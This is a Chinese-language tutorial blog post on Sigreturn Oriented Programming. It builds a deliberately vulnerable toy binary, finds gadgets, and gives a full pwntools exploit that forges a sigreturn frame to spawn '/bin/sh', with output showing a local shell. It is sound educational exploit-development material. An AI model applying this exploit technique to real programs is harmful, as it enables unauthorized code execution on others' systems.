SROP
SROP
Sigreturn Oriented Programming (SROP), a novel technique for exploits and backdoors in UNIX-like systems. 具体见[1]。
漏洞程序
- vuln程序
from pwn import *
context.arch = 'amd64'
context.os = 'linux'
elf = ELF.from_assembly(
'''
mov rdi, 0;
mov rsi, rsp;
sub rsi, 8;
mov rdx, 500;
syscall;
ret;
pop rax;
ret;
''', vma=0x41000
)
elf.save('vuln')
└─$ cat /usr/include/asm/unistd_64.h | grep -i sigreturn -A2
#define __NR_rt_sigreturn 15
#define __NR_ioctl 16
#define __NR_pread64 17
- 嵌入shell地址
┌──(kali㉿kali)-[~/exploits/srop]
└─$ echo -en "/bin/sh\x00" >> vuln
┌──(kali㉿kali)-[~/exploits/srop]
└─$ strings -tx vuln |grep /bin/sh
1238 /bin/sh
pwn
- 查看gadget
$ objdump -d -M intel vuln
vuln: file format elf64-x86-64
Disassembly of section .shellcode:
0000000000041000 <__start>:
41000: 48 c7 c7 00 00 00 00 mov rdi,0x0
41007: 48 89 e6 mov rsi,rsp
4100a: 48 83 ee 08 sub rsi,0x8
4100e: 48 c7 c2 f4 01 00 00 mov rdx,0x1f4
41015: 0f 05 syscall
41017: c3 ret
41018: 58 pop rax
41019: c3 ret
- pwn
from pwn import *
elf = context.binary = ELF('./vuln', checksec=False)
p = process()
BINSH = elf.address + 0x1238
POP_RAX = 0x41018
SYSCALL_RET = 0x41015
frame = SigreturnFrame()
frame.rax = 0x3b # syscall number for execve
frame.rdi = BINSH # pointer to /bin/sh
frame.rsi = 0x0 # NULL
frame.rdx = 0x0 # NULL
frame.rip = SYSCALL_RET
payload = b'A' * 8
payload += p64(POP_RAX)
payload += p64(0xf) # syscall number for sigreturn
payload += p64(SYSCALL_RET) # execute syscall instruction
payload += bytes(frame)
p.sendline(payload)
p.interactive()
pwn success
┌──(kali㉿kali)-[~/exploits/srop]
└─$ python exploit.py
[+] Starting local process '/home/kali/exploits/srop/vuln': pid 1960175
[*] Switching to interactive mode
$ who
kali pts/0 Feb 13 20:48 (192.168.44.1)
参考
- 原文作者:winsun
- 原文链接:https://winsun.github.io/fightsec/post/pwn_06_srop/
- 版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议进行许可,非商业转载请注明出处(作者,原文链接),商业转载请联系作者获得授权。